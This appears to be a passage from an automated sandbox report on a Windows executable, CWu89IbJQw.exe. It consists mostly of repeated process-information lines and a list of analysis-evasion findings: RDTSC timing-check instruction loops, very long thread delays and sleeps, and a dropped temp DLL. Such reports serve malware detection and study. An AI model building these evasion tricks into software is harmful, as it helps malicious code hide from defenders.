            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeAPI/Special instruction interceptor: Address: 3761783
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeAPI/Special instruction interceptor: Address: 26F1783
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeRDTSC instruction interceptor: First address: 373CA52 second address: 373CA52 instructions: 0x00000000 rdtsc 0x00000002 test ebx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4D18C63F15h 0x00000008 cmp cl, FFFFFF99h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeRDTSC instruction interceptor: First address: 26CCA52 second address: 26CCA52 instructions: 0x00000000 rdtsc 0x00000002 test ebx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4D192C4115h 0x00000008 cmp cl, FFFFFF99h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeMemory allocated: 4580000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeMemory allocated: 34EB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeMemory allocated: 34CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598699Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598579Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597829Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597704Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597583Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595822Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595657Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595537Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595282Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595157Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595043Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594704Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594579Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 593954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 593829Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeWindow / User API: threadDelayed 8332Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeWindow / User API: threadDelayed 1480Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf7A8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeAPI coverage: 2.3 %
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -35971150943733603s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4108Thread sleep count: 8332 > 30Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4108Thread sleep count: 1480 > 30Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598699s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -598079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597583s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -597079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -596079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595822s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595537s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -595043s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -594079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -593954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104Thread sleep time: -593829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0040646B FindFirstFileA,FindClose,12_2_0040646B
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_004027A1 FindFirstFileA,12_2_004027A1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_004058BF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 599063Jump to behavior
